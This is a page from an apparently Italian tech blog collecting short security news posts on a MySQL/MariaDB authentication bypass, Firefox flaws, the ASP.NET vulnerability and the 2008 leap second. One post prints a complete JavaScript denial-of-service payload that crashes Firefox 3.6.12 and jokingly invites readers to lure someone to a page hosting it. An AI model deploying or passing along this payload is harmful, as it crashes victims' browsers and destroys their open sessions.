Buco di sicurezza in MySQL/MariaDB

È stato scoperto un pericoloso baco in MySQL/MariaDB che potrebbe permettere l’accesso come root ad un database server.

La vulnerabilità non funziona su tutte le installazioni di MySQL (inclusa CentOS) e dipende da come è stato compilato il server.

Il problema risiede nella routine di autenticazione di un utente. Quando viene aperta una connessione a MySQL/MariaDB viene generato un token calcolando un SHA della password fornita e di una stringa casuale; il token viene quindi confrontato con l’SHA calcolato con il valore corretto. Per un errore di cast potrebbe succedere che le due stringhe vengano considerate uguali anche se non lo sono e anche se memcmp() ritorna un valore diverso da zero; se si verifica questo caso, MySQL/MariaDB pensa che la password sia corretta e permette l’accesso. La probabilità che questo accada è di 1/256.

Leggi tutto “Buco di sicurezza in MySQL/MariaDB”

0day di Mozilla Firefox 3.6.12

<!--

0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia	<scox@backtrack.it>

-->

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>

<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}

for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}

</script>


Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

Il problema è stato scoperto dal gruppo italiano Backtrack.

Firefox: esposizione della password nell’URL

In mancanza di altri programmi i browser possono essere utilizzate anche come client FTP.

Per collegarsi, ad esempio, a mail.siamogeek.com con l’utente utente e la password segreta si può digitare questo URL:

ftp://utente:segreta@mail.siamogeek.com

Purtroppo Firefox registra questo URL nella cache, quindi se, dopo essersi collegati la prima volta a questo sito, si digita di nuovo l’inizio (o parte) dell’URL ecco cosa appare:

State, quindi, attenti se utilizzate browser altrui per collegarvi a siti di cui non volete rivelare la password.

Una segnalazione del baco è già presente in Bugzilla.

No, l’utente utilizzato per questa dimostrazione non esiste più, è inutile tentare, tanto non funziona. (via Bugtraq)

ASP.NET: la cosa si fa seria (aggiornamento)

Contrariamente a quanto riportato da Microsoft, sembra che gli attacchi che sfruttano la vulnerabilità di ASP.NET siano non solo fattibili, come mostra il video qui sopra, ma anche in corso.

La situazione sembra seria e chi amministra un sito esposto a Internet basato su ASP.NET dovrebbe al più presto prendere le contromisure consigliate da Microsoft per mitigare il problema.

La vulnerabilità in questione permette, di fatto, di passare attraverso la sicurezza del framework ASP.NET senza blocchi in poche decine di minuti. (via Schneier on Security)

Aggiornamento 28/9/2010 06:15: Microsoft rilascerà oggi un aggiornamento d’emergenza sul Download Center; pare che le contromisure consigliate non siano molto efficaci, quindi l’aggiornamento è d’obbligo.

Aggiornamento 28/9/2010 19:45: la patch è stata rilasciata.

Il secondo intercalare

31 Dicembre 2008 23:59:58
31 Dicembre 2008 23:59:59
31 Dicembre 2008 23:59:60
1 Gennaio 2009 00:00:00
1 Gennaio 2009 00:00:01

Errore? No, è esattamente quello che è successo quella notte a causa dell’introduzione del secondo intercalare (leap second in inglese). Leggi tutto “Il secondo intercalare”

Scoperto un problema di sicurezza di Firefox

FirefoxTreatpost segnala un problema di sicurezza che interessa tutte le versioni di Firefox scoperto da Armorize.

Il browser non controlla gli indirizzi offuscati a cui si accede attraverso IFRAME, permettendo ad un attaccante di confondere o nascondere l’indirizzo del sito che si sta effettivamente visitando.

Leggi tutto “Scoperto un problema di sicurezza di Firefox”